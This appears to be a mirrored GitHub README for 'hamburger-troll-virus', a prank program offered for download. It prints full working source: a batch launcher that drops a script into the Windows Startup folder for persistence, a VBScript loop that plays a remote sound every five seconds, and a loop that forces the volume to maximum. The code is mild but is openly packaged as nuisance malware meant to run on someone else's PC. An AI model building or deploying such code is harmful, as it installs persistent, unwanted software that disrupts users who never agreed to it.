Code Monkey home page Code Monkey logo

hamburger-troll-virus's Introduction

hamburger

Hamburger-troll-virus

What does it do?

It let's your PC say "HAMBURGER" every 5 seconds with full volume after login or reboot

FAQ

Is it dangerous?

  • No

How can I get rid of it?

  • Execute uninstall.exe

It does not start!

  • Just wait or log off

Download

Releases

How it works

  • launcher.bat
@echo off
move hamburger.vbs %temp%
move volup.vbs %temp%
move tab.bat "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"
move launcher.bat %temp%

Installs files

  • hamburger.vbs
While true
Dim oPlayer
Set oPlayer = CreateObject("WMPlayer.OCX")
wscript.sleep 5000
oPlayer.URL = "https://www.myinstants.com/media/sounds/hamburger-sound-effect.mp3"
oPlayer.controls.play
While oPlayer.playState <> 1 ' 1 = Stopped
WScript.Sleep 100
Wend
oPlayer.close
Wend

Plays the "hamburger" sound every 5 seconds

  • volup.vbs
do
wscript.sleep 50
Set WshShell = CreateObject("WScript.Shell")
WshShell.SendKeys(chr(&hAF))
loop

raises volume to max using "sendkeys" command

  • tab.bat
cd %temp%
start hamburger.vbs
start volup.vbs
exit

Starts everything

Compiler

IExpress

LMAO🤣

hamburger-troll-virus's People

Contributors

leo-aqua avatar

Stargazers

 avatar  avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.